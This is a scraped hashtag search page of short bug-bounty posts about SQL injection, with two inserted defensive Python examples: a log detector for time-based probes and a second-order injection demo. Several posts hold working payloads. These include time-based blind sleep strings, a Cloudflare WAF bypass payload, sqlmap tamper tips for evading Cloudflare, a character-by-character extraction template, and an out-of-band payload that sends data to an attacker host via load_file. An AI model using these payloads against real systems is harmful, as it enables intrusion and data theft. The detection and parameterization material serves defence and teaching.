#sqli search results
🚨 I found the coolest #SQLi on a target! Surprisingly, the SQLi was in the "ignore cookies" button of the cookie banner. As I always say and do, don’t just look for SQLis in parameters. Check uncommon places like cookie banners, cookie accept buttons, etc. #BugBounty…


Cloudflare 403 bypass to time-based blind SQLi: PL: (select(0)from(select(sleep(10)))v) → 403 but PL: (select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v) → Time-based Blind SQLi #BugBounty #SQLi


Second-Order SQL Injection 1️⃣ Attacker injects payload into a field that is stored in DB (e.g., username). 2️⃣ Later, another query uses this stored value unsafely. 3️⃣ Payload executes → data leak, auth bypass, or privilege escalation. #SQLi #BugBounty #WebSecurity



Discovered a very interesting path based SQLi yesterday. Injected: /‘XOR(if(now()=sysdate(),sleep(8),0))XOR’111/ → No delay /page/‘XOR(if(now()=sysdate(),sleep(8),0))XOR’111/test.test triggered delay. Same payload, different results. Here's why👇 1/4 #BugBounty #SQLi #WebSec

Time-Based Blind SQLi: No errors, no data in response—just time as your oracle. Inject SLEEP() or pg_sleep() to measure delays and confirm injection points. Perfect for Burp Intruder with time diff analysis. Slow… but revealing. 💉 #BugBounty #sqli

Having trouble bypassing filters after finding #SQLInjection? Check out these tricks from @appSecExp that will help you get through them quickly. Have any tips you swear by? Share them with us! #SQLi #hacking #infosec
⚡️SQLi Time Based Payloads ✅Join Telegram to Download- t.me/brutsecurity/1… #sqli #bugbounty #bugbountytips

Exceptional SQLi ✔️ Top 100 overall severity high to exceptional @intigriti ✔️ And this is just the warm-up 🔥 #SQLIMaster #BugBounty #SQLi #InfoSec #CyberSecurity #Leaderboard



I've made a Ghauri Command Generator GUI tool. This tool saves you a lot of time. link h6nt3r.github.io/gcg/ #BugBounty #sqli

GoDaddy SQL Injection Vulnerability..:) Follow Us: youtube.com/@nullsecurityx #BugBounty #Cybersecurity #sqli #Pentesting

Stored-procedure SQLi: If DB allows privileged procedures, chain queries to perform OOB calls or side-effects (e.g., network/cmd execution via safe-redacted proc). Pattern: invoke a safe-redacted proc that performs an outbound action with substituted data. #BugBounty #SQLi

💉 SQL injection bypassing Cloudflare When testing a site, you can bypass Cloudflare's SQL injection protection using sqlmap and a combination of space2comment, between, randomcase tamper scripts. #web #sqli

🔍 Tip for finding SQLi in WordPress plugins: - Study the code—check $wpdb queries & inputs. - Enumerate endpoints, forms, params w/ WPScan or manually. - Test for SQLi w/ payloads like ' OR 1=1 --. 💡 Might lead to a private CVE! Stay ethical #BugBounty #SQLi


Have been here on X providing lots of things I found about #XSS, filter/WAF evasion, #SQLi, even #SSRF and other stuff as @BRuteLogic for the last 13+ yrs. So please don't think I'm just advertising w/ the content I create, I'm just trying to make a living out of my work. Thx.
🚨 MEDIUM severity: CVE-2025-11288 targets CRMEB v5.0–5.6 with a public SQL injection flaw. No patch, vendor silent! Audit your systems & secure endpoints ASAP. 🔍 Details & mitigations: radar.offseq.com/threat/cve-202… #OffSeq #SQLi...

Vulnerabilities such as #XSS and #SQLi are declining, while authorization flaws such as Improper Access Control and #IDOR are increasing significantly. In total, in 2025, 1,121 #باگبانتی (bug bounty) programs on HackerOne included the AI domain, a 270% increase.

When your report gets triaged faster than your food delivery 🍕😂 #BugBounty #SQLi #intigriti #CyberSecurity

Blind SQL injection When an app hides query results, attackers extract data via side-channels: boolean-based (true/false) or time-based (delays). Redacted example: IF((SELECT SUBSTRING(secret,1,1)='a'), SLEEP(5),0) Effective against blind/WAFed targets #BugBounty #Infosec #Sqli
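The two posts above (time-based blind SQLi and the boolean/time side-channel) describe what an attacker's probes look like on the wire; the defender's counterpart is spotting those probes in access logs. The following added example (my own code, not from any of the posts) parses constructed common-log-format lines, URL-decodes the request target boundedly, and flags delay primitives used as timing oracles across engines (MySQL sleep()/benchmark(), PostgreSQL pg_sleep(), MSSQL WAITFOR DELAY). The sample log lines and IPs are constructed; the payload shapes come from the posts on this page.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the page). Lines 1 and 2 carry time-based
# probes (a MySQL sleep() in a query parameter, a PostgreSQL pg_sleep() in a path segment);
# line 3 is a benign request.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2025:12:00:01 +0000] "GET /item?id=1%27XOR(if(now()%3Dsysdate()%2Csleep(8)%2C0))XOR%27Z HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2025:12:00:09 +0000] "GET /page/%27%3B%20select%20pg_sleep(6)--/test.test HTTP/1.1" 200 40
198.51.100.7 - - [10/Oct/2025:12:00:10 +0000] "GET /item?id=42&sort=price HTTP/1.1" 200 2048
"""

# Common-log-format request line: client IP, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Delay primitives used as a timing oracle: MySQL sleep()/benchmark(), PostgreSQL pg_sleep(),
# MSSQL WAITFOR DELAY. Case-insensitive because SQL keywords are.
TIME_ORACLE_RE = re.compile(r"\b(sleep|pg_sleep|benchmark)\s*\(|\bwaitfor\s+delay\b", re.IGNORECASE)


def decode_target(target, max_rounds=3):
    """URL-decode repeatedly but boundedly, so a double-encoded payload (%2527) does not
    slip past the pattern while a pathological input cannot loop forever."""
    for _ in range(max_rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target


def flag_time_based_probes(log_text):
    """Return one finding per request whose decoded target contains a delay primitive."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line: skip it rather than crash the pipeline
        decoded = decode_target(m.group("target"))
        hit = TIME_ORACLE_RE.search(decoded)
        if hit:
            findings.append({
                "ip": m.group("ip"),
                "timestamp": m.group("ts"),
                "primitive": (hit.group(1) or "waitfor delay").lower(),
                "decoded_target": decoded,
            })
    return findings


if __name__ == "__main__":
    for f in flag_time_based_probes(SAMPLE_LOG):
        print(f"{f['timestamp']} {f['ip']} {f['primitive']}: {f['decoded_target']}")
```

Matching on the decoded target rather than the raw log line is the point: the second sample line hides its probe in a path segment rather than a parameter, and both are percent-encoded, so a pattern applied to the raw line or only to query parameters misses them. Pair the match with the response time (not captured in this log format) to separate a real delay from a blocked attempt.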
SQL Injection is still dangerous — here are 3 quick ways to stop it: parameterized queries, strict input validation, and proper error handling + monitoring. Protect your app. 🛡️ #AppSec #WebSecurity #SQLi #DevSecOps #CyberSecurity
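The second-order SQL injection post earlier on this page (payload stored safely at registration, executed later by a query that trusts the stored value) and the "parameterized queries" advice just above are two sides of the same bug. The following added example (my own code, not from either post) builds an in-memory SQLite database with constructed tables and sample rows, stores a username with a parameterized INSERT, and then shows the later "notes for user" query both as a vulnerable string concatenation and in its parameterized form. The table names, usernames and note bodies are all constructed for the demonstration.

```python
import sqlite3


def setup_db():
    """Constructed schema and sample data: users register themselves, notes belong to an owner."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT NOT NULL)")
    conn.execute("CREATE TABLE notes (id INTEGER PRIMARY KEY, owner TEXT NOT NULL, body TEXT NOT NULL)")
    conn.executemany(
        "INSERT INTO notes (owner, body) VALUES (?, ?)",
        [("alice", "alice: quarterly numbers"), ("bob", "bob: password reset link")],
    )
    conn.commit()
    return conn


def register(conn, username):
    """Step 1: registration is parameterized, so the payload is stored as plain data
    and nothing suspicious happens here. Returns the new user's id."""
    cur = conn.execute("INSERT INTO users (username) VALUES (?)", (username,))
    conn.commit()
    return cur.lastrowid


def notes_for_user_vulnerable(conn, user_id):
    """Step 2 (vulnerable second-order sink): the stored username is re-used by string
    concatenation because it 'came from our own database' and is assumed to be trusted."""
    (username,) = conn.execute("SELECT username FROM users WHERE id = ?", (user_id,)).fetchone()
    sql = "SELECT body FROM notes WHERE owner = '" + username + "'"
    return [body for (body,) in conn.execute(sql)]


def notes_for_user_fixed(conn, user_id):
    """Step 2 (fixed): the stored username is bound as a parameter, so it can only ever
    be compared literally and the quote inside it has no syntactic effect."""
    (username,) = conn.execute("SELECT username FROM users WHERE id = ?", (user_id,)).fetchone()
    return [body for (body,) in conn.execute("SELECT body FROM notes WHERE owner = ?", (username,))]


def demo():
    """Register a normal user and one whose username carries a stored payload, then compare sinks."""
    conn = setup_db()
    alice_id = register(conn, "alice")
    payload_id = register(conn, "x' OR '1'='1")  # stored harmlessly; the sink decides what it means
    return {
        "alice_fixed": notes_for_user_fixed(conn, alice_id),
        "payload_vulnerable": notes_for_user_vulnerable(conn, payload_id),
        "payload_fixed": notes_for_user_fixed(conn, payload_id),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

The lesson for code review is that "validated on input" is not the same as "safe at every sink": the registration path here is correct, and the bug lives entirely in a query that never sees user input directly. Parameterizing every query, not only the ones that take request parameters, is what closes it.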




CVE-2025-11077 (SQL injection): There is a blind SQL injection in the Online Learning Management system via the title POST parameter (boolean/time‑based). Exploit : github.com/byteReaper77/C… #vulnerability #sqlinjection #sqli #blindSQLi #PoC #exploit #CVE
Top 10 web areas to start your hunt with: 1. SQL Injection (#SQLi) 2. Cross-Site Scripting (#XSS) 3. Cross-Site Request Forgery (#CSRF) 4. Insecure Direct Object References (#IDOR) 5. Clickjacking (#Clickjacking) 6. Command Injection (#CommandInjection) 7. Remote File…
Penetration testing on a TryHackMe web app uncovered open ports, a vulnerable image gallery with SQL injection, and exposed database via backups and hidden files—demonstrating the power of thorough web enumeration and escalation. #SQLi #WebTesting ift.tt/jSqiC6u
💥 From SQLi to RCE – Real exploitation step by step 📺 youtu.be/WXZEsDVzWUQ ✅ Full enumeration ✅ HTML Injection + XSS ✅ Classic SQLi ✅ Escalation to real RCE ✅ Offensive mindset applied #BugBounty #SQLi #RCE #HackingEtico #WebSecurity #Pentesting #Ciberseguridad





🕵️♂️ P1 Finding of the day: While in wbu, spotted an '/ajax/' in an endpoint. Browsing returned a blank page, so going deep found 2020 archived URL with 2 parameters; still got a blank page. After some efforts crafted my own GET and POST HTTP request. #BugBounty #SQLi 1/n








Another SQL Injection #sqli -- Payload: id=1'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z It's a Healthcare Company - Ops! happy to secure SO much patient data & more... #sqli #bugbounty #bugbountytips

Manual testing can be both fun and insightful, especially when you have an error like SQLSTATE[HY000] to guide you; it's a great way to sharpen your skills. Today I did a full manual test using Burp Suite on a target and got it correct. It was fun. #BugBounty #SQLi
![nav1n0x's tweet image](https://pbs.twimg.com/media/GMQc_KLWUAAeaWT.png)
🧠 Out-of-Band SQLi → Silent Data Leak 1️⃣ Error & time-based SQLi blocked 2️⃣ Payload forces DB to send request: '; SELECT load_file('\\\\attacker(.)com\\leak')-- 3️⃣ Data exfiltrated via DNS/HTTP 🎯 No error, no delay — data leaks quietly #bugbounty #sqli #oob #infosec




Do not forget to test 'Newsletter Signup' form for SQLi & stored XSS. This public bb target is on bc since 2022 & has different s/u forms for home page & internal pages, the internal one was vulnerable - probably not being maintained. #BugBounty #SQLi.

